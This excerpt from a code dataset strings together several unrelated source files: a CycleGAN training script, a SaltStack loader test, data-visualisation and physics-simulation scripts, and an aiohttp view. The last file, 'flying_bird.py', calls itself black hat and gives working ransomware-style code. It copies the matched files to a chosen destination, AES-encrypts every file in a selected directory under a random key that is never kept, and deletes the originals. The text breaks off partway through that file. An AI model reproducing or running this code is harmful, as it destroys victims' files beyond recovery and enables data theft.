dog\")\nplt.savefig('figure_1.png')\n\nplt.subplot(121)\nplt.title('Cat')\nplt.imshow(sample_cat[0] * 0.5 + 0.5)\n\nplt.subplot(122)\nplt.title('Cat with random jitter')\nplt.imshow(random_jitter(sample_cat[0]) * 0.5 + 0.5)\n\nprint(\"Plotting cat\")\nplt.savefig('figure_2.png')\n\n# Configure Pix2Pix model\nOUTPUT_CHANNELS = 3\n\n# Loss function\n# Loss Functions\ndef discriminator_loss(loss_obj, real, generated):\n real_loss = loss_obj(tf.ones_like(real), real)\n generated_loss = loss_obj(tf.zeros_like(generated), generated)\n total_disc_loss = real_loss + generated_loss\n return total_disc_loss * 0.5\n\ndef generator_loss(loss_obj, generated):\n return loss_obj(tf.ones_like(generated), generated)\n\ndef calc_cycle_loss(real_image, cycled_image):\n loss1 = tf.reduce_mean(tf.abs(real_image - cycled_image))\n return LAMBDA * loss1\n\ndef identity_loss(real_image, same_image):\n loss = tf.reduce_mean(tf.abs(real_image - same_image))\n return LAMBDA * 0.5 * loss\n\nLAMBDA = 10\n\nclass CycleGAN(keras.Model):\n def __init__(self, p_lambda=LAMBDA, summary=False, **kwargs):\n super(CycleGAN, self).__init__(**kwargs)\n self.p_lambda = p_lambda\n\n # Architecture\n self.generator_g = pix2pix.unet_generator(OUTPUT_CHANNELS, norm_type='instancenorm')\n self.generator_f = pix2pix.unet_generator(OUTPUT_CHANNELS, norm_type='instancenorm')\n\n self.discriminator_x = pix2pix.discriminator(norm_type='instancenorm', target=False)\n self.discriminator_y = pix2pix.discriminator(norm_type='instancenorm', target=False)\n\n # Optimizers\n self.generator_g_optimizer = tf.keras.optimizers.Adam(2e-4, beta_1=0.5)\n self.generator_f_optimizer = tf.keras.optimizers.Adam(2e-4, beta_1=0.5)\n\n self.discriminator_x_optimizer = tf.keras.optimizers.Adam(2e-4, beta_1=0.5)\n self.discriminator_y_optimizer = tf.keras.optimizers.Adam(2e-4, beta_1=0.5)\n\n # Loss\n self.loss_obj = tf.keras.losses.BinaryCrossentropy(from_logits=True)\n\n # Metric trackers\n self.total_cycle_loss_tracker = tf.keras.metrics.Mean(name=\"total_cycle_loss\")\n self.total_gen_g_loss_tracker = tf.keras.metrics.Mean(name=\"total_gen_g_loss\")\n self.total_gen_f_loss_tracker = tf.keras.metrics.Mean(name=\"total_gen_f_loss\")\n self.disc_x_loss_tracker = tf.keras.metrics.Mean(name=\"disc_x_loss\")\n self.disc_y_loss_tracker = tf.keras.metrics.Mean(name=\"disc_y_loss\")\n\n @tf.function\n def train_step(self, data):\n # persistent is set to True because the tape is used more than\n # once to calculate the gradients.\n real_x, real_y = data\n with tf.GradientTape(persistent=True) as tape:\n # Generator G translates X -> Y\n # Generator F translates Y -> X.\n\n fake_y = self.generator_g(real_x, training=True)\n cycled_x = self.generator_f(fake_y, training=True)\n\n fake_x = self.generator_f(real_y, training=True)\n cycled_y = self.generator_g(fake_x, training=True)\n\n # same_x and same_y are used for identity loss.\n same_x = self.generator_f(real_x, training=True)\n same_y = self.generator_g(real_y, training=True)\n\n disc_real_x = self.discriminator_x(real_x, training=True)\n disc_real_y = self.discriminator_y(real_y, training=True)\n\n disc_fake_x = self.discriminator_x(fake_x, training=True)\n disc_fake_y = self.discriminator_y(fake_y, training=True)\n\n # calculate the loss\n gen_g_loss = generator_loss(self.loss_obj, disc_fake_y)\n gen_f_loss = generator_loss(self.loss_obj, disc_fake_x)\n\n total_cycle_loss = calc_cycle_loss(real_x, cycled_x) + calc_cycle_loss(real_y, cycled_y)\n\n # Total generator loss = adversarial loss + cycle loss\n total_gen_g_loss = gen_g_loss + total_cycle_loss + identity_loss(real_y, same_y)\n total_gen_f_loss = gen_f_loss + total_cycle_loss + identity_loss(real_x, same_x)\n\n disc_x_loss = discriminator_loss(self.loss_obj, disc_real_x, disc_fake_x)\n disc_y_loss = discriminator_loss(self.loss_obj, disc_real_y, disc_fake_y)\n\n # Calculate the gradients for generator and discriminator\n generator_g_gradients = tape.gradient(total_gen_g_loss,\n self.generator_g.trainable_variables)\n generator_f_gradients = tape.gradient(total_gen_f_loss,\n self.generator_f.trainable_variables)\n\n discriminator_x_gradients = tape.gradient(disc_x_loss,\n self.discriminator_x.trainable_variables)\n discriminator_y_gradients = tape.gradient(disc_y_loss,\n self.discriminator_y.trainable_variables)\n\n # Apply the gradients to the optimizer\n self.generator_g_optimizer.apply_gradients(zip(generator_g_gradients,\n self.generator_g.trainable_variables))\n\n self.generator_f_optimizer.apply_gradients(zip(generator_f_gradients,\n self.generator_f.trainable_variables))\n\n self.discriminator_x_optimizer.apply_gradients(zip(discriminator_x_gradients,\n self.discriminator_x.trainable_variables))\n\n self.discriminator_y_optimizer.apply_gradients(zip(discriminator_y_gradients,\n self.discriminator_y.trainable_variables))\n\n # compute progress\n self.total_cycle_loss_tracker.update_state(total_cycle_loss)\n self.total_gen_g_loss_tracker.update_state(total_gen_g_loss)\n self.total_gen_f_loss_tracker.update_state(total_gen_f_loss)\n self.disc_x_loss_tracker.update_state(disc_x_loss)\n self.disc_y_loss_tracker.update_state(disc_y_loss)\n return {\n \"total_cycle_loss\": self.total_cycle_loss_tracker.result(),\n \"total_gen_g_loss\": self.total_gen_g_loss_tracker.result(),\n \"total_gen_f_loss\": self.total_gen_f_loss_tracker.result(),\n \"disc_x_loss\": self.disc_x_loss_tracker.result(),\n \"disc_y_loss\": self.disc_y_loss_tracker.result()\n }\n\ncyclegan = CycleGAN(p_lambda=LAMBDA, summary=True)\nto_cat = cyclegan.generator_g(sample_dog)\nto_dog = cyclegan.generator_f(sample_cat)\nplt.figure(figsize=(8, 8))\ncontrast = 8\n\nimgs = [sample_dog, to_cat, sample_cat, to_dog]\ntitle = ['Dog', 'To Cat', 'Cat', 'To Dog']\n\nfor i in range(len(imgs)):\n plt.subplot(2, 2, i+1)\n plt.title(title[i])\n if i % 2 == 0:\n plt.imshow(imgs[i][0] * 0.5 + 0.5)\n else:\n plt.imshow(imgs[i][0] * 0.5 * contrast + 0.5)\nplt.savefig('figure_3.png')\n\nplt.figure(figsize=(8, 8))\n\nplt.subplot(121)\nplt.title('Is a real cat?')\nplt.imshow(cyclegan.discriminator_y(sample_cat)[0, ..., -1], cmap='RdBu_r')\n\nplt.subplot(122)\nplt.title('Is a real dog?')\nplt.imshow(cyclegan.discriminator_x(sample_dog)[0, ..., -1], cmap='RdBu_r')\n\nplt.savefig('figure_4.png')\nprint(\"Model builded\")\n\n# Checkpoints\nfrom tensorflow.keras.callbacks import ModelCheckpoint\nfrom tensorflow.keras.callbacks import TerminateOnNaN\nfilepath = 'best_weight_model.h5'\ncheckpoint = ModelCheckpoint(filepath=filepath,\n monitor='loss',\n verbose=1,\n save_best_only=True,\n save_weights_only=True,\n mode='min')\nterminate = TerminateOnNaN()\ncallbacks = [checkpoint, terminate]\n\n# Training\nEPOCHS = 20\n\n# Train\ntrain_dataset = tf.data.Dataset.zip((train_dogs, train_cats))\ncyclegan.compile()\ncyclegan.fit(train_dataset,\n batch_size = BATCH_SIZE,\n epochs = EPOCHS,\n initial_epoch = 0,\n steps_per_epoch = steps_per_epoch,\n callbacks = callbacks)\ncyclegan.save_weights(\"model_vae_faces_1e4.h5\")\n\n\ndef generate_images(model, test_input, figname):\n prediction = model(test_input)\n\n plt.figure(figsize=(12, 12))\n\n display_list = [test_input[0], prediction[0]]\n title = ['Input Image', 'Predicted Image']\n\n for i in range(2):\n plt.subplot(1, 2, i + 1)\n plt.title(title[i])\n # getting the pixel values between [0, 1] to plot it.\n plt.imshow(display_list[i] * 0.5 + 0.5)\n plt.axis('off')\n plt.savefig(figname)\n\n# Run the trained model on the test dataset\nfor idx, inp in enumerate(train_dogs.take(5)):\n generate_images(cyclegan.generator_g, inp, f\"testimage_{idx+1}\")","repo_name":"manuel-suarez/homework-ml2-cycle-gan-model-cats-vs-dogs","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":11684,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"12851563124","text":"import warnings\n\nimport pytest\nfrom saltfactories.utils import random_string\n\nimport salt.config\nimport salt.loader\nfrom salt.loader.lazy import LazyLoader\n\n\n@pytest.fixture(scope=\"module\")\ndef loaded_base_name():\n return random_string(\"{}.\".format(__name__), digits=False, uppercase=False)\n\n\n@pytest.fixture(scope=\"module\")\ndef opts(loaded_base_name):\n return salt.config.minion_config(None)\n\n\ndef _loader_id(value):\n return value[0]\n\n\n@pytest.fixture(\n params=(\n (\"static_loader\", (\"modules\", \"test\")),\n (\"raw_mod\", (\"test\", None)),\n (\"minion_mods\", ()),\n (\"metaproxy\", ()),\n (\"matchers\", ()),\n (\"engines\", (None, None, None)),\n (\"proxy\", ()),\n (\"returners\", (None,)),\n (\"utils\", ()),\n (\"pillars\", (None,)),\n (\"tops\", ()),\n (\"wheels\", ()),\n (\"outputters\", ()),\n (\"serializers\", ()),\n (\"eauth_tokens\", ()),\n (\"auth\", ()),\n (\"fileserver\", (None,)),\n (\"roster\", ()),\n (\"thorium\", (None, None)),\n (\"states\", (None, None, None)),\n (\"beacons\", (None,)),\n (\"log_handlers\", ()),\n (\"ssh_wrapper\", ()),\n (\"render\", (None,)),\n (\"grain_funcs\", ()),\n (\"runner\", ()),\n (\"queues\", ()),\n (\"sdb\", ()),\n (\"pkgdb\", ()),\n (\"pkgfiles\", ()),\n (\"clouds\", ()),\n (\"netapi\", ()),\n (\"executors\", ()),\n (\"cache\", ()),\n ),\n ids=_loader_id,\n)\ndef loader(request, opts, loaded_base_name):\n loader_name, loader_args = request.param\n loader = getattr(salt.loader, loader_name)(\n opts, *loader_args, loaded_base_name=loaded_base_name\n )\n try:\n with warnings.catch_warnings():\n warnings.simplefilter(\"ignore\")\n # Force loading all functions\n list(loader)\n yield loader\n finally:\n if not isinstance(loader, LazyLoader):\n for loaded_func in loader.values():\n loader = loaded_func.loader\n break\n if isinstance(loader, LazyLoader):\n loader.clean_modules()\n\n\ndef test_loader(loader, loaded_base_name):\n if not isinstance(loader, LazyLoader):\n for loaded_func in loader.values():\n loader = loaded_func.loader\n loader_tag = loader.tag\n assert loader.loaded_base_name == loaded_base_name\n module_name = loaded_func.func.__module__\n try:\n assert module_name.startswith(loaded_base_name)\n except AssertionError:\n if loader_tag != \"utils\":\n raise\n else:\n loader_tag = loader.tag\n assert loader.loaded_base_name == loaded_base_name\n for func_name in list(loader._dict):\n module_name = loader[func_name].__module__\n try:\n assert module_name.startswith(loaded_base_name)\n except AssertionError:\n if loader_tag != \"utils\":\n raise\n","repo_name":"saltstack/salt","sub_path":"tests/pytests/functional/loader/test_loaded_base_name.py","file_name":"test_loaded_base_name.py","file_ext":"py","file_size_in_byte":3008,"program_lang":"python","lang":"en","doc_type":"code","stars":13606,"dataset":"github-code","pt":"78"} +{"seq_id":"42782937514","text":"#Libraries for Data Visualization\n\nimport pandas as pd\nimport matplotlib.pyplot as plt \nimport matplotlib.patches as mpatches\nimport numpy as np \nimport seaborn as sns\nimport time\nimport pandas_profiling as pp\n\nfrom sklearn.preprocessing import StandardScaler, RobustScaler #Scaling Time and Amount\nfrom mpl_toolkits import mplot3d\nfrom sklearn.feature_selection import SelectKBest, mutual_info_classif, RFECV\nfrom sklearn.model_selection import StratifiedKFold, learning_curve, StratifiedShuffleSplit, ShuffleSplit\nfrom sklearn.metrics import f1_score, precision_score, precision_recall_fscore_support, fbeta_score, classification_report, roc_curve, roc_auc_score, confusion_matrix\nfrom sklearn.linear_model import LogisticRegression\nfrom sklearn.svm import LinearSVC, SVC\nfrom sklearn.ensemble import AdaBoostClassifier, RandomForestClassifier\nfrom sklearn.tree import DecisionTreeClassifier\n\n\n## Visualizations functions\n\ndef histograms(series):\n if isinstance(series,pd.Series):\n mn=int(min(series))\n mx=int(max(series))\n n_bins=len(range(mn,mx))+1\n ax=sns.distplot(series,n_bins,kde=False)\n ax.set_title('{}'.format(series.name))\n plt.show()\n elif isinstance(series,pd.DataFrame):\n cols=series.columns\n length=len(cols)\n if length%4==0:\n n_rows=4\n n_columns=length//4\n else:\n n_rows=4\n n_columns=length//4+1\n \n fig, axis=plt.subplots(nrows=n_rows,ncols=n_columns)\n for i in range(length):\n mn=int(min(series[cols[i]]))\n mx=int(max(series[cols[i]]))\n n_bins=len(range(mn,mx))+1\n sns.distplot(series[cols[i]],n_bins,kde=False,ax=axis.flatten()[i])\n axis.flatten()[i].set_title(cols[i])\n plt.show()\n else:\n raise ValueError('Please use pd.Series or pd.DataFrame as argument.')\ndef boxplots(series):\n if isinstance(series,pd.Series):\n ax=sns.boxplot(series)\n ax.set_title('{}'.format(series.name))\n plt.show()\n elif isinstance(series,pd.DataFrame):\n cols=series.columns\n length=len(cols)\n if length%2==0:\n n_rows=2\n n_columns=length//2\n else:\n n_rows=2\n n_columns=length//2+1\n\n fig, axis=plt.subplots(nrows=n_rows,ncols=n_columns)\n for i in range(length):\n sns.boxplot(series[cols[i]],ax=axis.flatten()[i])\n axis.flatten()[i].set_title(cols[i])\n plt.show()\n else:\n raise ValueError('Please use pd.Series or pd.DataFrame as argument.')\ndef countplots(series):\n if isinstance(series,pd.Series):\n ax=sns.countplot(series)\n ax.set_title('{}'.format(series.name))\n plt.show()\n elif isinstance(series,pd.DataFrame):\n cols=series.columns\n length=len(cols)\n if length%2==0:\n n_rows=2\n n_columns=length//2\n else:\n n_rows=2\n n_columns=length//2+1\n\n fig, axis=plt.subplots(nrows=n_rows,ncols=n_columns)\n for i in range(length):\n sns.countplot(series[cols[i]],ax=axis.flatten()[i])\n axis.flatten()[i].set_title(cols[i])\n plt.show()\n else:\n raise ValueError('Please use pd.Series or pd.DataFrame as argument.')\ndef frequency_plot(df,feature,feature_to_group='LeagueId'):\n freq_prep=train_df[[feature_to_group,feature]].groupby([feature_to_group]).sum()\n counts=freq_prep[feature].values\n leagues=freq_prep.index.values\n length=len(leagues)\n if length%2==0:\n n_rows=2\n n_columns=length//2\n else:\n n_rows=2\n n_columns=length//2+1\n\n fig, axis=plt.subplots(nrows=n_rows,ncols=n_columns)\n for i in range(len(leagues)):\n feature_counts=train_df[train_df[feature_to_group]==leagues[i]].groupby([feature]).count()[feature_to_group].values\n freqs=np.asarray(feature_counts)/sum(feature_counts)\n feature_values=train_df[train_df[feature_to_group]==leagues[i]].groupby([feature]).count()[feature_to_group].index.values\n sns.barplot(x=feature_values,y=freqs,ax=axis.flatten()[i])\n axis.flatten()[i].set_title('{} : {}'.format(feature_to_group,leagues[i]))\n plt.suptitle('{}'.format(feature))\n plt.show()\n\n## Import Data\n\ninput=pd.read_csv('StudentsPerformance.csv')\ndf=input.copy(deep=True)\n\nprint('\\n\\n ============ Printing df head and create profile ============= \\n\\n')\n\nprint(df.head())\nprint(df.shape)\n\nprint(df.dtypes)\n\n## Pandas Profiling\n\ntry:\n fn=open('pandas_profiling_1.html')\n fn.close()\nexcept:\n print('\\n---- No profile exists yet. Creating profile. ----\\n')\n profile=df.profile_report(title='Pandas Profiling Report')\n profile.to_file(output_file='pandas_profiling_1.html')\n\n## Plots\n\nsns.scatterplot(data=df,x='writing score',y='math score',hue='test preparation course')\nplt.show()\n\nsns.heatmap(df.corr(),annot=True,cmap='PuBu')\nplt.show()\n\nsns.pairplot(data=df,hue='race/ethnicity',diag_kind='kde',kind='scatter')\nplt.show()\n\nsns.catplot(data=df,x='race/ethnicity',kind='count',hue='gender',row='test preparation course',col='lunch')\nplt.show()\n\nsns.catplot(data=df,x='race/ethnicity',y='math score',kind='violin',hue='gender',row='test preparation course',col='lunch')\nplt.show()","repo_name":"pedro-m-leal/Student_Grades","sub_path":"visualization.py","file_name":"visualization.py","file_ext":"py","file_size_in_byte":5300,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"78"} +{"seq_id":"74279037370","text":"#####################################################################\n# This file is for doing whatever and probably shouldn't have been #\n# committed to Github, but there's an error in removing it so we #\n# have to live with it now, I guess. #\n#####################################################################\nfrom __future__ import print_function, division\nimport os\nimport sys\n\n\"\"\"Open MP and MKL should speed up the time required to run these simulations!\"\"\"\n# threads = sys.argv[1]\nthreads = 16\nos.environ['NUMEXPR_MAX_THREADS'] = '{}'.format(threads)\nos.environ['NUMEXPR_NUM_THREADS'] = '{}'.format(threads)\nos.environ['OMP_NUM_THREADS'] = '{}'.format(threads)\nos.environ['MKL_NUM_THREADS'] = '{}'.format(threads)\n# line 4 and line 5 below are for development purposes and can be remove\nfrom quspin.operators import hamiltonian, exp_op, quantum_operator # operators\nfrom quspin.basis import spinful_fermion_basis_1d # Hilbert space basis\nfrom quspin.tools.measurements import obs_vs_time # calculating dynamics\nfrom quspin.tools.evolution import evolve # evolving system\nimport numpy as np # general math functions\nfrom time import time # tool for calculating computation time\nfrom tqdm import tqdm\nimport matplotlib.pyplot as plt # plotting library\nfrom scipy.signal.windows import blackman\nfrom scipy import fftpack\nfrom scipy.interpolate import UnivariateSpline\nfrom quspin.tools.measurements import project_op\nfrom tools import HubbardModel as fhmodel, InitializeArchive\nimport psutil\nimport pandas as pd\nimport seaborn as sns\n\n\n\n# note cpu_count for logical=False returns the wrong number for multi-socket CPUs.\nprint(\"logical cores available {}\".format(psutil.cpu_count(logical=True)))\nt_init = time()\nnp.__config__.show()\n\n\n########################################################################################################################\n# Declare Parameters of system to be loaded\n########################################################################################################################\n\n\"\"\"Laser Pulse parameters\"\"\"\nfield = 32.9 # field angular frequency THz\nF0 = 10 # Field amplitude MV/cm\na = 4 # Lattice constant Angstroms\n\n\"\"\"Parameters for a target or reference field\"\"\"\n# Hubbard model\nL = 10 # system size\nN_up = L // 2 + L % 2 # number of fermions with spin up\nN_down = L // 2 # number of fermions with spin down\nN = N_up + N_down # number of particles\nt0 = 0.52 # hopping strength\nU = 0.00 * t0 # interaction strength\npbc = True\n\n# Parameters for evolving the system\ncycles = 10 # time in cycles of field frequency\nn_steps = 10000 # Number of steps for time resolution\n\n########################################################################################################################\n# Do you need to compare these results to something else\n########################################################################################################################\ncompare = True\n\nif compare:\n sim_type_to_compare = 0\n comp = fhmodel(\n nx=L, # L for system you want to compare to (should be the same)\n hopping=t0, # t0 of system you want to compare to (should be the same)\n interaction=0.0, # U of system you want to compare to\n n_up=N_up, # (should be the same)\n n_down=N_down, # (should be the same)\n angular_frequency=field, # (should be the same)\n lattice_constant=a, # a of system you want to compare to\n field_amplitude=4.0, # (should be the same)\n chem_potential=0, # (should be the same)\n cycles=cycles, # (should be the same)\n n_steps=10000, # number of steps for system you want to compare to\n ny=0, # 1D simulations do not use y-axis\n soc=0, # No spin orbit coupling\n gamma=0, # No gamma\n tracking=False, # Are you comparing to a field for tracking\n int_track=1 # If so, you need to list the U for the system you are tracking to\n )\n comp_lib = InitializeArchive(directory_number=sim_type_to_compare).get_dir()\n comp_path = comp_lib['data path']\n comp_tag = comp_lib['tag'] + comp.tag\n comp_file = np.load(comp_path + comp_tag + '.npz')\n comp_phi = UnivariateSpline(comp_file['times'], comp_file['phi'], k=3, s=0)\n comp_J = UnivariateSpline(comp_file['times'], comp_file['current'], k=3, s=0)\n\n########################################################################################################################\n# Load the relevant file\n########################################################################################################################\n# Reference: 0 for Targets, 1 for Tracking, 2 for superoscillations, 3 for importing anything else\nsim_type_to_be_loaded = 1\n\n# Target the filed to be loaded\nloader = InitializeArchive(directory_number=sim_type_to_be_loaded).get_dir()\nload_path = loader['data path']\nload_tag = loader['tag']\n\n# If pasting a direct location, use this\n#loadfile = './Data/BestFit_SCF/SCFparams_10sites-0,049TrackedTo0,000U-0,52t0-4,5F0-4TrackedTo4a-10cycles-4000steps_N133pulses.npz'\n# Otherwise have the class file find it for you\n\nmodU = np.array([0.025, 0.05, 0.075, 0.0875, 0.09375, 0.1])\nmodU *= t0\npulses = np.array([25, 50, 100, 200, 400, 800])\nloadingreaping = np.array([True, True, True, True, True, False])\nloadingwithoutreaping = np.array([False, False, False, False, False, False])\ncounter = np.array([0, 1, 2, 3, 4, 5])\n\n# Now build directory for saving files\ndirectory = InitializeArchive(directory_number=3)\nlib = directory.get_dir()\n\ndata_path = lib['data path']\nplot_path = lib['plots path']\nplot_name = lib['plot name']\nfiletag = lib['tag'] + comp.tag\n#filetag = lib['tag'] + 'params_10sites-0,049TrackedTo0,000U-0,52t0-4,5F0-4TrackedTo4a-10cycles-4000steps_N133pulses'\n\nparams = dict(\n nx=L,\n hopping=t0,\n n_up=N_up,\n n_down=N_down,\n angular_frequency=field,\n lattice_constant=a,\n field_amplitude=F0,\n chem_potential=0,\n cycles=cycles,\n n_steps=n_steps,\n ny=0, # 1D simulations do not use y-axis\n soc=0, # No spin orbit coupling\n gamma=0, #\n tracking=True, # Are you loading a field for tracking\n int_track=0, # If so, you need to list the U for\n scf=True,\n)\nreapingloadfile = []\nnoreapingloadfile = []\nU_tracker = []\npulses_tracker = []\nfor _ in modU:\n params['interaction'] = _\n for c in counter:\n # Bundle parameters to pass to Hubbard Model class for unit conversion\n params['pulses'] = pulses[c]\n params['reaping'] = loadingreaping[c]\n here = fhmodel(**params)\n reapingloadfile.append(load_path + load_tag + fhmodel(**params).tag + '.npz')\n U_tracker.append(_)\n pulses_tracker.append(pulses[c])\n print('Gained loading location: {}'.format(reapingloadfile[c]))\n params['reaping'] = loadingwithoutreaping[c]\n noreapingloadfile.append(load_path + load_tag + fhmodel(**params).tag + '.npz')\n print('Gained loading location: {}'.format(noreapingloadfile[c]))\n\n# get the converted units for creating a target field\nstart = 0.0\nstop = here.stop\ntimes, dt = np.linspace(start, stop, num=n_steps, endpoint=True, retstep=True)\n\nphi_holder = []\nJ_holder = []\nerror_tracker = []\n\nfor _ in noreapingloadfile:\n load = np.load(_)\n phi_interp = UnivariateSpline(load['times'], load['phi'], k=3, s=0)\n J_interp = UnivariateSpline(load['times'], load['current'], k=3, s=0)\n phi_holder.append([phi_interp(load['times'])])\n J_holder.append([J_interp(load['times'])])\n error_tracker.append(float(load['error']))\n\n\n\n########################################################################################################################\n# Plot results?\n########################################################################################################################\n\n\nfignum = 1\n\nplt.figure(fignum)\nfignum += 1\nerror_tracker = np.array(error_tracker)\ns = 10 * error_tracker / error_tracker.min()\nplt.scatter((np.array(U_tracker)*1/t0), np.log10(np.array(error_tracker)), s=pulses_tracker, c=pulses_tracker,\n cmap='spring', alpha=0.6)\nplt.colorbar(cmap='spring')\nplt.xlabel('U ($t_0$)')\nplt.ylabel('log$\\\\int Error^2 dt$')\nplt.tight_layout()\nplt.show()\n\n\ndef plot_spectrum(f, t, sim, **kwargs):\n \"\"\"\n Plot the High Harmonic Generation spectrum\n \"\"\"\n # Power spectrum emitted is calculated using the Larmor formula\n # (https://en.wikipedia.org/wiki/Larmor_formula)\n # which says that the power emitted is proportional to the square of the acceleration\n # i.e., the RHS of the second Ehrenfest theorem\n\n N = len(f)\n k = np.arange(N)\n\n # frequency range\n omegas = (k - N / 2) * np.pi / (0.5 * t.max())\n\n # spectra of the\n spectrum = np.abs(\n # used windows fourier transform to calculate the spectra\n # rhttp://docs.scipy.org/doc/scipy/reference/tutorial/fftpack.html\n fftpack.fft((-1) ** k * blackman(N) * f)\n ) ** 2\n spectrum /= spectrum.max()\n plt.semilogy(omegas / sim.omega, spectrum, **kwargs)\n plt.ylabel('spectrum (arbitrary units)')\n plt.xlabel(r'frequency / $\\omega$')\n plt.xlim([0, 20])\n plt.ylim([1e-15, 1.])\n\n\n\"\"\"colouring = list(\n plt.cm.get_cmap('plasma')(np.linspace(0., 0.8, 4))\n )\n\nplt.figure(fignum)\nfignum += 1\nplt.plot(times_target, tgt_current_interp(times_target), color=colouring[0])\nplt.plot(times_target, tgt_phi_interp(times_target), color=colouring[1])\nplt.plot(times, track_current_interp(times), color=colouring[2])\nplt.plot(times, track_phi_interp(times), color=colouring[3])\nplt.legend(['Target J', 'Target $\\\\Phi$', 'Track J', 'Track $\\\\Phi$'])\nplt.xlabel('Time')\n\n\n\nplt.figure(fignum)\nfignum += 1\nplot_spectrum(tgt_current, times_target, tgt, color=colouring[0])\nplot_spectrum(tgt_phi, times_target, tgt, color=colouring[1])\nplot_spectrum(track_current, times, track, color=colouring[2])\nplot_spectrum(track_phi, times, track, color=colouring[3])\nplt.legend(['Target J', 'Target $\\\\Phi$', 'Track J', 'Track $\\\\Phi$'])\nplt.show()\"\"\"\n\n","repo_name":"dibondar/superoscilations","sub_path":"superoscillations_for_quantum_control/Sandbox.py","file_name":"Sandbox.py","file_ext":"py","file_size_in_byte":10278,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"7606426346","text":"\nfrom aiohttp import web\n\nfrom db import question\n\nasync def index(request):\n async with request.app['db'].acquire() as conn:\n cursor = await conn.execute(question.select())\n ret = []\n async for row in cursor:\n ret.append(row.question_text)\n return web.json_response(ret)\n","repo_name":"fidemin/first-aiohttp","sub_path":"server/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":310,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"18733979745","text":"#!/usr/bin/python\n# -*- coding: utf-8 -*-\n\n# written in pure python and usual libs\n# BORN TO CODE \n\n# MELHORIAS SÃO BEM VINDAS.\n# ISSO É UM ESQUELETO.\n# @mrx6SO\n\n# Visit: https://github.com/mrx6SO/\n\n# madrugada é para codar. Entre outras coisas....\n#\n#\n# the world is a secure place, trust in this...\n# educational porpuoses only. for sure. \n\n# this is pure black hat, and how to defend ourself of this kinda of attack...\n\n# the code will be intuitive to the attacker and hidden to the 'victim'. If correctly adapted... \n\n# flying_bird.py flying like a bird \n# lol\n\n# tryng some py2exe \n# or some fisic acess\n# or do it in your lab : - )\n\n# i don't care... really \n\n# echo \n# echo\n# echo $LetsMoveOnKiddon$\n\n\n# so, the first thing is import the modules.\n# all knowllegd for us. \n# so, lets move on, kiddon - Mr Robot referencie. in the case of someone don't know.lol \n\n\n# those libs are avaiable for windows too\n# i forget the name...other time i'll fix it...\n\nfrom Crypto.Hash import SHA256\nfrom Crypto.Cipher import AES\n\n# basic libs\n\nimport os\nimport random\nimport sys\nimport pkg_resources\n\nimport re # to check the files\nimport shutil # for the copu\nimport time # delay between execution of functions\nimport easygui # for GUI stuffs\nimport string # for the password method \n\n#def find_files(pattern, path):\n\n# function to find the files\n\n# função para encontrar os arquivos\n\ndef find_files(pattern, path):\n\n for path, dirs, files in os.walk(path):\n\n for fname in files:\n\n full_file_name = os.path.join(path, fname) # join into path and all files\n \n match = re.match(pattern, full_file_name) # check if the file has a matched pattern \n\n if(match): # conditional for the match\n\n yield full_file_name # will save that untill next return. \n\n\n#function that copy matched files for the destination path / pendrive / email\n\n# função responsável pela cópia dos arquivos compatíveis para pasta / pendrive/ email selecionados\n\ndef copy_files(pattern, src_path, dest_path): \n\n \"\"\"\n function receive 3 arguments:\n \n - pattern of files : '.'\n - src_path = 'source path', where files are located\n - dest_path = 'destination path', where the files will be copied\n \n \"\"\"\n\n for full_file_name in find_files(pattern,src_path): # here the yield will be called \n\n print(full_file_name) + ' file was copied into ' + (dest_path) \n\n try: \n \n shutil.copy(full_file_name, dest_path) # made the copy of files into defined path\n\n except IOError: # in case of some error of input/output\n\n return # return to function \n\n# set up criptography - i choice for AES \n\n# defina a criptografia - optei pela AES\n\ndef encrypt(key, filename):\n \n chunksize = 64 * 1024\n outFile = os.path.join(os.path.dirname(filename), '.hell'+os.path.basename(filename))\n filesize = str(os.path.getsize(filename)).zfill(16)\n\n IV = ''\n \n for i in range(16):\n IV += chr(random.randint(0, 0xFF))\n \n encryptor = AES.new(key, AES.MODE_CBC, IV)\n \n with open(filename, 'rb') as infile:\n with open(outFile, 'wb') as outfile:\n outfile.write(filesize)\n outfile.write(IV)\n\n while True:\n\n chunk = infile.read(chunksize)\n \n if len(chunk) == 0:\n break\n \n elif len(chunk) % 16 !=0:\n chunk += ' ' * (16 - (len(chunk) % 16))\n \n outfile.write(encryptor.encrypt(chunk))\n \n \n# append the files found on the current directory\n\ndef allfiles(path):\n\n allFiles = []\n \n for root, subfiles, files in os.walk(path):\n for names in files:\n allFiles.append(os.path.join(root, names))\n \n return allFiles\n \n# key to guarantee singularity in the functions\n\ndef generated_key(size):\n\n caracters = '~{}^=+()@#$%*¨\\/[]&ABCDEFGHIJKLMNOPQRSTUVXZY0123456789abcdefghijlmnopqrstuwvxz0123456789'\n ps = ''\n\n for char in xrange(size):\n\n ps += random.choice(caracters)\n\n return ps\n\n\ndef done_crypt():\n\n #easygui.msgbox('Crypting system')\n\n choice = True\n #choice = raw_input(\"Do you want to (E)ncrypt or (D)ecrypt? \")\n \n encfiles = easygui.enterbox(\"Choise the path to encrypt\")\n allfiles(encfiles)\n encFiles = allfiles(encfiles)\n #(allfiles('C:\\\\teste')\n key = generated_key(16)\n\n #password = generated_key(16)\n\n if(choice):\n\n for Tfiles in encFiles:\n\n if os.path.basename(Tfiles).startswith(\".hell\"):\n\n print(\"%s is already encrypted\") %str(Tfiles)\n\n pass\n \n elif Tfiles == os.path.join(encFiles, sys.argv[0]):\n\n pass\n\n else:\n\n encrypt(SHA256.new(key).digest(), str(Tfiles))\n\n print(\"Done encrypting %s\") %str(Tfiles)\n \n os.remove(Tfiles)\n \ndef done_cp():\n\n #while True:\n\n # try:\n \n patt = '.' #the pattern\n \n if(os.name == 'nt'): # if system is Windows based\n\n # \"\"\"\n\n # select the source to do the copy\n # select destination path that will receive the previously copyed files\n\n # : the pattern is '.' cause it gets all the extensions\n # if is needed set up one or many different extension\n #: just modify the part of code that handle with it\n\n #\"\"\" \n\n #print('source path must be, for ex. | C:\\\\Users | with 2 slashs.')\n #src = raw_input('Source path: ')\n #dst = raw_input('Destination path: ')\n \n # 